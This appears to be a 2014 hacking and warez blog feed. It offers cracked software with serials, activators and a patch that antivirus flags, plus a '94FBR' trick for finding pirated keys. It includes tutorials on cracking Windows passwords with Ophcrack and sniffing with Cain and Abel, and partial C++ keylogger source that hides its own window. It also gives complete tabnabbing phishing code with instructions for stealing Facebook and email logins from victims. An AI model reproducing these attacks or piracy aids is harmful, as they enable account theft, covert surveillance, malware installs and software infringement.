Tuesday 20 May 2014

Uniblue DriverScanner 2014 4.0.12.1 Full Version + Serial

Uniblue DriverScanner 2014 4.0.12.1 Full Version + Crack/Activator/Patch/Free Download - Uniblue DriverScanner – the utility will search and download the latest version of the driver on your PC. Self-scan your system, the program will be outdated drivers and allows you to download their updated versions. The program also allows the user to make a backup of your system drivers, and in case of system failure or malfunction of any equipment after the driver update, restore the system to working condition. Like many other products of the developer, the program has a pleasant and friendly multilingual (including) the user interface.
Main features of DriverScanner 2014: 
• Scan and find outdated system drivers
• Download the latest version of the driver
• Select the number of simultaneous downloads
• Display the status of drivers
• Display the scanning process
• Create a backup installed drivers
• Restore the system after its collapse
• Minimize the program to the taskbar or system tray
• Display system tray icon
• Easy and intuitive user interface

Note : 
Please first block DriverScanner access to Internet to know how click here: How to Block an Application/ Program in Windows Firewall? else your product will turn back to trail after some days
Please try to activate DriverScanner 2014 first with Serial Keys given if not Activated then please use the activator to Activate your product 

Download Links:

Uniblue DriverScanner 2014 4.0.12.1 Setup

Uniblue DriverScanner 2014 4.0.12.1 Serial + Activator Only

PowerISO 5.9 Full Version With Key

PowerISO 5.9 Full Version + Crack/Patch/Keygen/Full Free Download:

PowerISO was developed to be a powerful CD/DVD image file processing tool, which allows you to open, extract, create, edit, compress, encrypt, split and convert ISO files, and mount these files with internal virtual drive.

PowerISO can process almost all CD-ROM image files including ISO and BIN. It can be used easily, which support shell integration, context menu, drag and drop, clipboard copy paste.
Features:

Create ISO File:
· Create ISO file or BIN CUE file from hard disc files.
· Create ISO file or BIN CUE file from CD / DVD / BD disc.
· Create bootable ISO image file.
· Detect various CD / DVD / BD image files automatically.
· Support ISO9660, Joliet and UDF file system.
· Support unicode file name.
· Optimize file layout to save disc space.

Edit ISO File:
· Add files to ISO file.
· Delete files in ISO file.
· Rename files in ISO file.
· Modify file’s date time in ISO file.
· Add boot information to ISO file to make bootable ISO image file.

Extract ISO File:
· Support ISO file and other popular disc image file, such as BIN / CUE, DAA, UIF, DMG, MDF / MDS, ASHDISC, BWI / B5I, LCD, IMG, CDI, CIF, P01, PDI, NRG, NCD, PXI, GI, FCD, VCD, C2D, BIF and so on.
· Support multi-session disc image file.
· Extract files from ISO file.
· View and run files contained in the ISO file.

Burn ISO File:
· Burn ISO file and other image file to CD-R, CD-RW, DVD-R, DVD-RW, DVD+R, DVD+RW, DVD-RAM, DVD-R DL, DVD+R DL, BD-R, BD-R DL, BD-RE, BD-RE DL.
· Burn Apple DMG files directly to CD / DVD / BD discs.
· Burn files and folders to CD / DVD / BD discs on the fly.
· Burn Audio CD from MP3, WMA, APE, FLAC, WAV, or BIN files.
· Burn Video image file to CD / DVD disc.
· Support two erasing modes for rewritable discs: Full Erasing and Quick Erasing.

Mount ISO File:
· Mount ISO file and other popular image file as virtual drive.
· Support up to 23 virtual drives.

Make Audio Disc:
· Create standard Audio CD.
· Create mixed mode CD.
· Support Audio CD-TEXT.
· Burn mp3, wma, wav, flac and ape files to CD.
· Burn bin / cue, mp3 / cue, wma / cue, wav / cue, flac / cue and ape / cue audio image files to CD.
· Edit existing Audio CD image files.
· Support Playing Audio Tracks within Audio CD image file.

Audio CD ripper:
· Rip audio CD to mp3, wma, wav, flac and ape files.
· Rip audio CD to bin / cue, mp3 / cue, wma / cue, wav / cue, flac / cue and ape / cue audio image files.

ISO and BIN Converter:
· Convert ISO to BIN.
· Convert BIN to ISO.
· Convert Apple DMG files to ISO file.
· Convert all popular images files to ISO file.
· Convert all popular images files to BIN file.

Open / Extract /Edit disk image file:
· Support all popular virtual disc image files, such as VMWare Virtual Disc Images(*.vmdk), VirtualBox Virtual Disc Images(*.vdi), Virtual PC Virtual Disc Images(*.vdi).
· Support all floppy disk image files, such as BIF, FLP, DSK, BFI, BWI, BIN, IMG and so on.
· Support disc image files with FAT12, FAT, FAT32, NTFS and ext2, ext3 partitions.

Create Bootable USB drive:
· Create bootable USB drive for Windows XP, Windows Vista and Windows 7.
· Support USB-FDD, USB-ZIP, and USB-HDD.

Supported CD/DVD disc image types:
· ISO (Generic CD images)
· BIN/CUE
· BIN (CDRWin)
· IMA/IMG (Generic disk images)
· CIF (Easy CD Creator)
· NRG (Nero – Burning ROM)
· IMG/CCD (CloneCD)
· MDF/MDS (Alcohol120%)
· VCD (Farstone Virtual Drive)
· VaporCD (Noum Vapor CDROM)
· P01/MD1/XA (Gear)
· VDI (Virtuo CD Manager)
· C2D (WinOnCD)
· BWI/BWT (BlinkWrite)
· CDI (DiscJuggler)
· TAO/DAO (Duplicator)
· PDI (Instant Copy)
· DMG (APPLE Disk Image)

Supported CD/DVD file systems:
· Standard ISO-9660
· Joliet ISO extension (CDs under Windows 95 and higher)
· RockRidge ISO extension (CDs under FreeBSD, Linux)
· El Torito extension (bootable CDs)
· Univeral Disk Format (UDF)
· XBOX DVD Format
· APPLE HFS
· APPLE HFS+

Easy and friendly interface:
· Support drag and drop.
· Support clipboard copy and paste.
· Support multiple languages.
Requirements:
OS: Windows 98, Me, 2000, Windows XP, Server 2003, Vista, Server 2008, Windows 7, Windows 8 / 8.1 (32-bit & 64-bit).

What’s New in This Release:
- Improve Bluray disc burning.
- Some minor bug fixes and enhancements.

Install Notes:
==> DisConnect Internet
==> Run the setup
==> Use the given KEY to Register
==> Enjoy … (Block The Application In FireWall)

Download Links:

                              Click Here To Download


Windows 7 Android Edition 2014 (x86/x64) Full Version

Windows 7 Android Edition 2014 (x86/x64) Full Version

Windows 7 Android Edition 2014 (x86/x64) | 2.50 GB

Minimum Requirement 
 Processor 
-2 GHz or faster processor 
Memory 
- Recommended 1GB RAM 
Hard disk space 
- 20 GB 
Media drive 
-DVD/CD authoring requires a compatible optical drive 
Video card 
-DirectX 9 graphics processor with WDM 1.0 or later driver 

Software 
- Adobe Flash Player 12.0.235 
- Adobe Flash Player ActiveX 12 
- Adobe Air 4.0.0.1390 
- Android Apps Player with ICS 
- All in One Video Converter 
- Autorun Virus Remover v3.3 
- Avast Antivirus 2014 
- Boot Screen Android Edition By DiLshad Sys 
- Bit Torrent 7.8.2 Build 30417 
- CCleaner Business Edition 4.08.4428 
- DAEMON Tools Pro Advanced 5.0.0316.0317 
- DirectX32 
- Eset Smart Security 7 Full 32 bit 
- Eset Smart Security 7 Full 64 bit 
- FileZilla 3.7.3 
- Firefox 26 Final 
- Foxit Reader 6.0.6.0722 
- Google Talk 1.0.0.104 Beta 
- Internet Explorer 11 Final X64 
- Internet Explorer 11 Final X86 
- Internet Download Manager 6.11.8 Final 
- Java Runtime Environment 1.7.0.45 
- K-Lite Codec Pack 10.15 (Full) 
- Malwarebytes Anti-Malware 1.61.0.1400 Final 
- .NET Framework Version AIO 
- Notepad++ 6.5 
- MS Office 2003 
- Microsoft Silverlight 5.1.10411.0 Final x64 
- Microsoft Silverlight 5.1.10411.0 Final x86 
- Picasa 3 9 
- Real Hide IP 6 
- ShockWave 11.5 Full 
- Skype 6.11.0.102 
- Team Viewer 9 
- TuneUp Utilities 2014 
- Ultra ISO 9.8.1 
- USB Disk Security 6.2.0.432 
- uTorrent 3.3.2 
- VLC Media Player 2.1.2 
- Visual C++ 2005 Redis 
- Visual C++ 2005 SP1_Redis 
- Visual C++ 2008 Redis 
- Visual C++ 2008 SP1 Redis 
- Visual C++ 2010 Redis 
- Visual C++ 2012 Redis 
- Winrar 5.0 
- Yahoo! Messenger 1150.0228 

Whats’ New??
- Boot Screen Android Edition 
- New Eye catching themes 
- New icon sets 
- New Sound schemes 
- New Registry settings 
- Hang time ratio improved 
- Added best shortcut styles 
- Improved application interface 
- Added RUN on start menu 
- Add change theme 
- Add change wallpaper 
- Add desktop icon settings 
- Advanced user accounting 
- Clear type view 
- Copy to Move to on right click 
- Disable Autorun Drive 
- Disable UAC 
- Disable Tool Tips 
- Don’t mark new applications 
- On Right Click Freeware Sys 
- Enable AVALON effects 
- Enable Clear Type Tuning 
- Enable DVD in media player 
- Enable Glass Effect(WDM) without graphics card 
- Enable MP3 Encoding on right click 
- Enable slow motion windows effects 
- Enable status bar in notepad 
- Get rid of windows mail splash 
- Give your self permission to modify all 
- Grant full admin control 
- DiLshad Sys Site direct link from right click (Firefox needed) 
- Removed Action center Icon 
- Windows speed tweaking 
- Wait to kill service – 2000 
- Low level hooks time out – 1000 
- Hang application time out – 1000 
- Menu show delay – 0 
- No low disk space warning 
- Process Schedule 1st Program 
- Mouse Speed Increased 
- Hang Ratio Decreased 
- Fast Shut Down And Login 
- Down Power After Shut Down 
- Touch Screen Feature Added 
- Grant Admin control on Right Click 
- Add Admin Tools on Desktop Context Menu 
- Add manage on Desktop Context Menu 
- Add Move to Folder on Desktop Context Menu 
- Add Copy To Folder on Desktop Context Menu 
- Add Task Manager on Desktop Context Menu 
- Add Take Ownship on Desktop Context Menu 
- Add Register and Unregister to .dll OCX Context Menu 
- 500ms Delay Aero 
- Larger Taskbar Previews 
- Removed Action center icon 
- small Taskbar Icon 
- Removed mail Splash 
- Detailed Shut Down And Login 
- Blocked Negative DNS Entery 
- turn Off System Beep 
- Turn off low Disk 
Note :- Please remember that at first login the theme tends to be classic like in windows 98.. 
So right click on desktop > select change theme > select the STUDIO theme out there. 
After that u’ll see the normal themed appearence. 
I really can’t figure out the issue associated with this theme settings. So please try this 
Screenshots :


 Download Links :

Monday 19 May 2014

Finding Serial Key Of Any Software Using Simple Google Trick



Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very interesting google trick which will allow you to find serial key of any software very easily.

How To Find Serial Key Of Any Software ?

The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

 1. Go to Google
 2. Then type  Software Name 94FBR
     Replace Software Name with the name of software whose serial key you want to find
     Eg: To find serial key of Nero i will type Nero 94fbr
 3. Now press Enter and you will find serial key of software you are looking for as shown below.


Hacking Window 7 Password Using Ophcrack


In this tutorial i will teach you to hack Window 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?
Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.

How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

 1. Download Ophcrack Live Cd by Clicking Here
 2. Download windows xp or windows 7 live cd depending on platform you are
     wishing to hack. For  example:
                        Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
                        Windows XP: Click on ophcrack XP LiveCD.
  3. Now burn the live image on to the cd.
  4. Insert the disc into drive and restart you computer.
  5. If everything goes right you will see screen like below.


 6. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
  7. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
  8. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the account is enabled you could log in without a password.

  
  9. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs
          is not available for free. But it does show the NTLM hash.
 10. Copy this hash value which is under NT Hash field.
 11. Navigate to https://crackstation.net/ which is an online hash cracking tool.
 12. Type in the hash value you copied down in Step 9, Enter the captche and click on Crack Hashes.

Saturday 17 May 2014

Corel Video Studio Pro X7 v17.0.0.249 Full Version + Crack


Corel Video Studio Pro X7 v17.0.0.249 Full Version + Keygen/Patch/Serial Free Download:

The ultimate in video-editing software

With a bold new 64-bit architecture, including a comprehensive 64-bit premium special effects pack, featuring 7 powerful FX applications, Corel® VideoStudio® Ultimate X7 is the easiest and most powerful VideoStudio ever. With faster rendering and more pro-quality video-editing tools, all within a simplified interface, VideoStudio Ultimate makes it faster to make the videos you love to create. Explore the benefits of FastFlick™, an easy 3-step way to quickly make and share great-looking movies in less time. Enjoy new performance gains with the ability to upscale HD to 4K, or render 4K projects faster. Create for YouTube or DVD, business or pleasure. Make it simple and fun to bring your ultimate video vision to any screen. – ” Corel”

Download Links:
                            Download here
               
               

Friday 16 May 2014

Internet Download Manager IDM 6.19 Build 9 Full Version + Patch

Internet Download Manager IDM 6.19.9 Full Version With Crack/Patch/Serial Key Free Download:
 Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.

Version 6.19 adds Windows 8 compatibility, adds IDM download panel for web-players that can be used to download flash videos from sites like YouTube, MySpaceTV, and Google Videos. It also features complete Windows 7 and Vista support, YouTube grabber, redeveloped scheduler, and MMS protocol support. The new version also adds improved integration for IE 10 and IE based browsers, redesigned and enhanced download engine, the unique advanced integration into all latest browsers, improved toolbar, and a wealth of other improvements and new features.

What’s new in version 6.19 Build 9 (Released: May 15, 2014)
-Improved downloading from file sharing sites

-Fixed bugs

Patch Screenshot:

Note : About Patch some of the Antivirus show this patch as a virus and some doesn’t show such but the thing is normally all/some patches are shown as virus as they were by-passing software’s this was the truth. If you believe in us please proceed with this and if you don’t believe what we were saying then follow this just patch according to my instruction and delete the patch and then start scanning your system if you find virus then, you don’t visit our site again OK!!! Please Trust us We care for you!!!!!!!!

Instructions:
1. If you have an older version installed or a version thats no longer registered/trial finished I suggest you un-install it and then install this.
2. Install IDM.
3. Exit IDM from Taskbar (make sure its not running in task manager)
4. Just place the given patch in the installation Folder (C:/program File/Internet Download Manager for 32 Bit PC  & (C:/program File (x86)/Internet Download Manager for 64 bit PC) folder of IDM.
5. Run it.
6. Enjoy Full Version Now:)……

Download Links:

                       IDM setup
                       IDM patch

Sunday 11 May 2014

Cain and Abel Password Sniffing

Cain and abel is one of best Tool that is commonly used to Poison the network or  Do a man in middle Attack in the whole Network.But According to the Oxid.it a company that makes it , its a password recovery tool :P for Windows  by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

How do I use it?

1.This is labelled to show the important buttons and what shows up once you open Cain and Abel.



Familiarise yourself with Cain and Abel and take a poke around. You you click random stuff nothing will stuff up your PC.

2.Networks Tab:

Shows all of the computers connected to your network and if you have the password and username you can access them.

3.SnifferTab:


Note: Turn off firewalls to prevent AVs and other firewalls to stop Cain and Abel from scouring your network! Cain and Abel is NOT a virus, but has hacking behaviours which AVs pick up.

3.APR:

The next image will show what you see when you click the +


2.Password Tab:

This is where all the stuff that has been picked up by the sniffer and APR will be here. High-lighted in red is where everything picked up via HTTP or browsers are sent out to router:




How to code keylogger in C programming Language



C code champ has brought you a detailed tutorial on how to write a Keylogger code in C programming.
C program of Keylogger or keystroke logger :  Keylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works…

C program of Keylogger or Keystroke logger


Algorithm for writing a Simple Keylogger :

    1. Create an Empty log file for storing keylogs.
    2. Intercept keys pressed by user using GetAsyncKeyState() function.
    3.  Store these intercepted values in file.
    4.  Hide the Running Window Dialog to make it undetectable.
    5.  Use while loop to make it running in all conditions.
    6.  Add Sleep() function to reduce the CPU usage to 0%.


Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file.

C program of Keylogger or keystroke logger :

    #include<iostream>
    #include<windows.h>
    #include<fstream>
    #include<time.h>
    using namespace std;

    int main()
    {
     bool runlogger = true;
     ofstream log;
     //where your logs will be stored
     log.open("C:\\log.txt", ofstream::out);
     //displaying error message when unable to open file
     if(log.fail())
      {
       printf("Error in opening log.txt file\n");
       }
      //Code for hiding running dialog
      HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
      ShowWindow(hideIt,0);
      //Logic for capturing keystokes 

Advanced Tabnabbing Tutorial


Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tab nabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..
Advanced Tabnabbing, Hack Facebook, Gmail, Yahoo , Hotmail etc
Advanced Tabnabbing Tutorial
I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
Let consider a attack scenario:
1. A EthicalHacker say(me Vinay) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I (Vinay) sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:

     <!--
    Title: Advanced Tabnabbing using IFRAMES and Java script
    Author: De$trUcTiVe M!ND (ethax.blogspot.in)
    Website: http://www.ethax.blogspot.in
    Version:1.6
    -->

    <html>
    <head><title></title></head>
    <style type="text/css">
    html {overflow: auto;}
    html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
    iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
    </style>
    <body>

    <script type="text/javascript">
    //----------Set Script Options--------------
    var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
    var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
    var FAKE_PAGE_URL = "http://www.ethax.blogspot.in"; //Set this to the url of the fake page
    var FAKE_PAGE_TITLE = "hacking ethax| Next Generation Hackers Portal"; //This sets the title of the fake page
    var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
    var FAKE_FAVICON = "http://www.ethax.blogspot.in./favicon.ico"; //Set's the fake favicon.
    var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
    var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
    //---------------End Options-----------------
    var TIMER = null;
    var SWITCHED = "false";

    //Find Browser Type
    var BROWSER_TYPE = "";
    if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
     BROWSER_TYPE = "Internet Explorer";
    }
    //Set REAL_PAGE_TITLE
    document.title=REAL_PAGE_TITLE;

    //Set FAVICON
    if(REAL_FAVICON){
     var link = document.createElement('link');
     link.type = 'image/x-icon';
     link.rel = 'shortcut icon';
     link.href = REAL_FAVICON;
     document.getElementsByTagName('head')[0].appendChild(link);
    }

    //Create our iframe (tabnab)
    var el_tabnab = document.createElement("iframe");
    el_tabnab.id="tabnab";
    el_tabnab.name="tabnab";
    document.body.appendChild(el_tabnab);
    el_tabnab.setAttribute('src', REAL_PAGE_URL);

    //Focus on the iframe (just in case the user doesn't click on it)
    el_tabnab.focus();

    //Wait to nab the tab!
    if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
     el_tabnab.onblur = function(){
     TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
     }
     el_tabnab.onfocus= function(){
     if(TIMER) clearTimeout(TIMER);
     }
    } else {
     setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
    }

    function TabNabIt(){
     if(SWITCHED == "false"){
     //Redirect the iframe to FAKE_PAGE_URL
     el_tabnab.src=FAKE_PAGE_URL;
     //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
     if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

     //Change the favicon -- This doesn't seem to work in IE
     if(BROWSER_TYPE != "Internet Explorer"){
     var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
     for (var i=0; i<links.length; i++) {
     var looplink = links[i];
     if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
     document.getElementsByTagName("head")[0].removeChild(looplink);
     }
     }
     var link = document.createElement("link");
     link.type = "image/x-icon";
     link.rel = "shortcut icon";
     link.href = FAKE_FAVICON;
     document.getElementsByTagName("head")[0].appendChild(link);
     }
     }
    }
    </script>

    </body>
    </html>


Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

Saturday 10 May 2014

New XSS Cheat Sheet - Bypassing Modern Web Application Firewall XSS Filters



While we doing web application penetration testing for our clients, we may some time have to face the Web application Firewall that blocks every malicious request/payload.

There are some Cheat sheets available on internet that helped to bypass WAF in the past. However, those cheats won't work with the modern WAFs and latest browsers.

So, here is need for creating new Cheat sheet.

One of the top security researcher Rafay Baloch has done an excellent job by organizing his own techniques to bypass modern WAFs and published a white paper on that.

The paper titled "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" covers only the techniques needed for bypassing XSS filters.

SSLsplit: Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.


SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encryptednetwork connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both
IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs
forged X509v3 certificates on-the-fly, based on the original server certificate
subject DN and subjectAltName extension. SSLsplit fully supports Server Name
Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and
ECDHE cipher suites. SSLsplit can also use existing certificates of which the
private key is available, instead of generating forged ones. SSLsplit supports
NULL-prefix CN certificates and can deny OCSP requests in a generic way.

SSLsplit version 0.4.5 released on Nov 07, change logs are

- Add support for 2048 and 4096 bit Diffie-Hellman.
- Fix syslog error messages (issue #6).
- Fix threading issues in daemon mode (issue #5).
- Fix address family check in netfilter NAT lookup (issue #4).
- Fix build on recent glibc systems (issue #2).
- Minor code and build process improvements.

Create Wordlists using Crunch in Kali Linux

About Crunch

 Crunch is a tool for creating bruteforce wordlists which can be used to audit password strength. The size of these wordlists is not to be underestimated, however crunch can make use of patterns to reduce wordlist sizes, can compress output files in various formats and (since v2.6) now includes a message advising the size of the wordlist that will be created, giving you a 3 second window to stop the creation should the size be too large for your intended use.

Go to Application > Kali Linux > Password Attacks > Offline Attacks > then choose the Crunch option.


or open the Terminal and type Crunch. it will open Crunch for you.
Syntax for Creating WordList :-
crunch <min> <max> <charset> -t <pattern> – o <filename.lst>
Where,
min = minimum chractor that you want to add in your word list
max = maximum chractor that you want to add in your word list
Charset = Which charactor you want to add in your wordlist like abcd  or 123455
Pattern = Your worlist pattern for example, you want to create the numbers from 98******* means your first two digit will static and last digits will be variable.

For example, i want to create minimum 10 digits , maximum 10 digits , abcd987 chratorset with pattern abc@@@@@@@ and to save the file on the desktop.

So my syntex will be
root@KaliLinux:~#crunch 10 10  abcd987 -t abc@@@@@@ -o /root/Desktop/file.txt

it will create a 823543 lines of password

100 Keyboard Shortcuts (Windows)

 

The General Shortcuts: 


CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
Delete (Delete)
Shift+Delete (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+Shift while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+Shift with any of the arrow keys (Highlight a block of text)
Shift with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
Alt+Enter (View the properties for the selected item)
Alt+F4 (Close the active item, or quit the active program)
Alt+Enter (Display the properties of the selected object)
Alt+Spacebar (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
Alt+Tab (Switch between the open items)
Alt+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
Shift+F10 (Display the shortcut menu for the selected item)
Alt+Spacebar (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
Alt+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
Backspace (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
Shift when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts:
CTRL+Tab (Move forward through the tabs)
CTRL+Shift+Tab (Move backward through the tabs)
Tab (Move forward through the options)
Shift+Tab (Move backward through the options)
Alt+Underlined letter (Perform the corresponding command or select the corresponding option)
Enter (Perform the command for the active option or button)
Spacebar (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
Backspace (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts:
Win (Display or hide the Start menu)
Win+BREAK (Display the System Properties dialog box)
Win+D (Display the desktop)
Win+M (Minimize all of the windows)
Win+Shift+M (Restore the minimized windows)
Win+E (Open My Computer)
Win+F (Search for a file or a folder)
CTRL+Win+F (Search for computers)
Win+F1 (Display Windows Help)
Win+ L (Lock the keyboard)
Win+R (Open the Run dialog box)
Win+U (Open Utility Manager)
Accessibility Keyboard Shortcuts:
Right Shift for eight seconds (Switch FilterKeys either on or off)
Left Alt+left Shift+PRINT SCREEN (Switch High Contrast either on or off)
Left Alt+left Shift+NUM LOCK (Switch the MouseKeys either on or off)
Shift five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Win +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts:
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+* (Display all of the subfolders that are under the selected folder)
NUM LOCK++ (Display the contents of the selected folder)
NUM LOCK+- (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys For Character Map:
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
Spacebar (Switch between Enlarged and Nor mal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts:
